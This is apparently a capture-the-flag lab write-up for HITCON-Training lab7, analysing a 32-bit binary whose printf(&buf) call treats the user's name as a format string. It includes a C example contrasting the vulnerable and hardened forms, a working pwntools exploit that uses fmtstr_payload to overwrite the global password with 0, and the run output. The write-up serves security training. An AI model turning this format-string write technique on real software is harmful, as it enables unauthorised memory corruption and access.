[HITCON-Training] lab7
cg10036
2019. 11. 18. 07:16
Summary
32bit
format string bug
Analysis
main
int __cdecl main(int argc, const char **argv, const char **envp)
{
    unsigned int v3; // eax
    int fd; // ST14_4
    char nptr; // [esp+8h] [ebp-80h]
    char buf; // [esp+18h] [ebp-70h]
    unsigned int v8; // [esp+7Ch] [ebp-Ch]

    v8 = __readgsdword(0x14u);
    setvbuf(_bss_start, 0, 2, 0);
    v3 = time(0);
    srand(v3);
    fd = open("/dev/urandom", 0);
    read(fd, &password, 4u);
    printf("What your name ? ");
    read(0, &buf, 0x63u);
    printf("Hello ,");
    printf(&buf);
    printf("Your password :");
    read(0, &nptr, 0xFu);
    if ( atoi(&nptr) == password )
    {
        puts("Congrt!!");
        system("cat /home/crack/flag");
    }
    else
    {
        puts("Goodbyte");
    }
    return 0;
}
The format string bug is triggered where the name is printed: printf(&buf) uses the user-supplied name itself as the format string.
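To make the defect concrete, here is an added example (not the lab's source) that reproduces the printf(&buf) pattern beside its hardened form, with output captured through snprintf so the two can be compared; the function names and the "100%%" probe input are constructed for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Added example, not the lab's own code. Mirrors the decompiled main():
 * printf("Hello ,"); printf(&buf); hands the user-supplied name to printf
 * as the format string, so every %-directive in it is interpreted. */
static int greet_vulnerable(char *out, size_t outlen, const char *name)
{
    int n = snprintf(out, outlen, "Hello ,");
    if (n < 0 || (size_t)n >= outlen)
        return n;
    /* Same defect as printf(&buf): name is the format, not an argument. */
    return n + snprintf(out + n, outlen - n, name);
}

/* Hardened form: a constant format with the name passed as a "%s" argument.
 * A '%' in the name is copied verbatim and never interpreted, which removes
 * the read/write primitive the exploit below depends on. */
static int greet_hardened(char *out, size_t outlen, const char *name)
{
    return snprintf(out, outlen, "Hello ,%s", name);
}

/* Additional input check: a real name has no reason to contain '%', so the
 * service can reject such input, and logging the rejection gives a cheap
 * detection signal for format-string probing. */
static int name_is_clean(const char *name)
{
    return strchr(name, '%') == NULL;
}

int main(void)
{
    char v[64], h[64];
    /* Constructed probe: "%%" is the printf escape for a literal '%'. */
    const char *probe = "100%%";
    greet_vulnerable(v, sizeof v, probe);
    greet_hardened(h, sizeof h, probe);
    printf("vulnerable: %s\n", v);   /* "Hello ,100%"  : directive consumed */
    printf("hardened:   %s\n", h);   /* "Hello ,100%%" : bytes copied as-is */
    return name_is_clean(probe) ? 0 : 1;
}
```

Compiling the vulnerable function with -Wformat-security (enabled by default on many distributions) already flags the non-literal format, which is the cheapest way to catch this bug before it ships.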
Exploit
from pwn import *
e = ELF("./crack")
p = process("./crack")
p.recvuntil("What your name ? ")
payload = fmtstr_payload(10, {e.symbols["password"] : 0})
p.send(payload)
p.recvuntil("Your password :")
p.send("0")
p.interactive()
Use the format string bug to overwrite password with 0, then enter 0 as the password.
cg10036@cg10036-virtual-machine:~/HITCON-Training/LAB/lab7$ p ex.py
[*] '/home/cg10036/HITCON-Training/LAB/lab7/crack'
Arch: i386-32-little
RELRO: Partial RELRO
Stack: Canary found
NX: NX enabled
PIE: No PIE (0x8048000)
[+] Starting local process './crack': pid 3233
[*] Switching to interactive mode
Congrt!!
cat: /home/crack/flag: 그런 파일이나 디렉터리가 없습니다